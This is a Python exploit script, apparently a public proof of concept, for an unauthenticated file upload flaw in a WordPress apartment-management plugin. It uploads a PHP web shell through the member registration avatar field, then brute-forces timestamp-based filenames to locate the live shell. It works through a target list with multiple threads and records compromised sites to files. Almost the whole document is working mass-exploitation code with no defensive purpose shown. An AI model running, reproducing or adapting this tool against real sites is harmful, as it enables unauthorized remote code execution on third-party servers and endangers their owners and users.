import threading
import requests
import time
import os
import urllib3
from rich.console import Console
from rich.panel import Panel
from rich.text import Text
from rich import box
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
console = Console()
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
success_file = "success_results.txt"
uploaded_shells_file = "uploaded_shells.txt"
shell_local_file = "shell.php"
INITIAL_SLEEP_AFTER_UPLOAD = 5
NUM_RETRIES = 8
SLEEP_BETWEEN_RETRIES = 4
VERIFY_SSL = False
TIMESTAMP_WINDOW = 5 # seconds window for timestamp guessing
def ascii_banner():
banner = r"""
_____ ___ ___ ___ _______ ___ ______ __ ___________ _______ ________
(\" \|" \ |" \/" | | __ "\ |" | / " \ |" \(" _ ")/" "||" "\
|.\\ \ | \ \ / (. |__) :)|| | // ____ \ || |)__/ \\__/(: ______)(. ___ :)
|: \. \\ | \\ \/ |: ____/ |: | / / ) :)|: | \\_ / \/ | |: \ ) ||
|. \ \. | /\. \ (| / \ |___(: (____/ // |. | |. | // ___)_ (| (___\ ||
| \ \ | / \ \ /|__/ \ ( \_|: \\ / /\ |\ \: | (: "||: :)
\___|\____\)|___/\___|(_______) \_______)\"_____/ (__\_|_) \__| \_______)(________/
"""
console.print(Text(banner, style="bold cyan"))
info_panel = Panel(
Text(
"Author: Nxploited (Khaled Alenazi)\n"
"Telegram: @KNxploited\n"
"GitHub: github.com/Nxploited",
style="bold magenta"
),
box=box.ROUNDED,
style="cyan"
)
console.print(info_panel)
def generate_filename(original_filename: str, mark: str = "pimg", ts: int = None):
if ts is None:
ts = int(time.time())
ext = original_filename.rsplit(".", 1)[1] if "." in original_filename else ""
return f"{ts}-{mark}-in.{ext}"
def write_result(filename, value):
with open(filename, "a", encoding="utf-8") as f:
f.write(f"{value}\n")
def check_shell(shell_url):
try:
r = requests.get(shell_url, headers={"User-Agent": user_agent}, timeout=15, verify=VERIFY_SSL)
return r.status_code, r.text
except Exception as e:
return None, str(e)
def exploit_target(target_url, shell_marker):
if not os.path.exists(shell_local_file):
console.print(Panel(f"[ERROR] File '{shell_local_file}' not found.", style="bold red"))
return
upload_ts = int(time.time())
email = f"nxploited_{upload_ts}@poc.com"
files = {
"amgt_user_avatar": (shell_local_file, open(shell_local_file, "rb"), "application/octet-stream")
}
data = {
"building_id": "1",
"unit_cat_id": "2",
"unit_name": "Unit A",
"member_type": "Owner",
"first_name": "Nx",
"last_name": "Ploited",
"gender": "male",
"birth_date": "1996-01-01",
"mobile": "1122334455",
"email": email,
"password": "Nx123456!",
"registration_front_member": "1"
}
upload_url = target_url.rstrip("/") + "/apartment-management-member-registration-page/"
console.print(Panel(f"[EXPLOIT] Uploading shell to:\n{upload_url}", style="bold yellow"))
try:
requests.post(upload_url, data=data, files=files, headers={"User-Agent": user_agent}, verify=VERIFY_SSL)
files["amgt_user_avatar"][1].close()
console.print(Panel("[✓] Shell uploaded, searching for shell location...", style="bold green"))
except:
try: files["amgt_user_avatar"][1].close()
except: pass
console.print(Panel("[!] Shell upload failed", style="bold red"))
return
time.sleep(INITIAL_SLEEP_AFTER_UPLOAD)
console.print(Panel(f"⏳ Brute-forcing timestamp window: {upload_ts-TIMESTAMP_WINDOW} to {upload_ts+TIMESTAMP_WINDOW} (window={TIMESTAMP_WINDOW})", style="bold cyan"))
found = False
for attempt in range(NUM_RETRIES):
for delta in range(-TIMESTAMP_WINDOW, TIMESTAMP_WINDOW + 1):
guessed_ts = upload_ts + delta + attempt
shell_name = generate_filename(shell_local_file, ts=guessed_ts)
shell_url = f"{target_url.rstrip('/')}/wp-content/uploads/apartment_assets/{shell_name}"
status, body = check_shell(shell_url)
if status == 200 and shell_marker in body:
console.print(Panel(f"[✓] LIVE SHELL WORKING!\n{shell_url}", style="bold green"))
write_result(success_file, f"{target_url} | {shell_url}")
write_result(uploaded_shells_file, shell_url)
found = True
break
elif status == 200:
console.print(Text(f"[200] {shell_url} (shell marker not found)", style="bold yellow"))
elif status:
console.print(Text(f"[{status}] {shell_url}", style="bold red"))
else:
console.print(Text(f"[FAIL] No response from server: {shell_url}", style="bold red"))
if found:
break
time.sleep(SLEEP_BETWEEN_RETRIES)
if not found:
console.print(Panel(f"[✗] Shell not accessible or not found:\n{target_url}", style="bold red"))
def split_list(lst, num):
return [lst[i::num] for i in range(num)]
def thread_worker(targets, shell_marker):
for target_url in targets:
exploit_target(target_url, shell_marker)
def main():
ascii_banner()
list_file = console.input("[yellow]Enter targets file name (e.g., list.txt): [/]").strip()
threads_count = console.input("[yellow]Enter number of threads (default 10): [/]").strip()
shell_marker = console.input("[yellow]Enter shell marker to search for (default: Nxploited): [/]").strip()
if not shell_marker:
shell_marker = "Nxploited" # Default
if not threads_count.isdigit() or int(threads_count) < 1:
threads_count = 10
else:
threads_count = int(threads_count)
with open(list_file, "r", encoding="utf-8") as f:
targets = [line.strip() for line in f if line.strip()]
split_targets = split_list(targets, threads_count)
thread_list = []
for chunk in split_targets:
th = threading.Thread(target=thread_worker, args=(chunk, shell_marker))
th.daemon = True
th.start()
thread_list.append(th)
for th in thread_list:
th.join()
console.print(Panel("Done! Results in success_results.txt & uploaded_shells.txt.", style="bold green"))
if __name__ == "__main__":
main()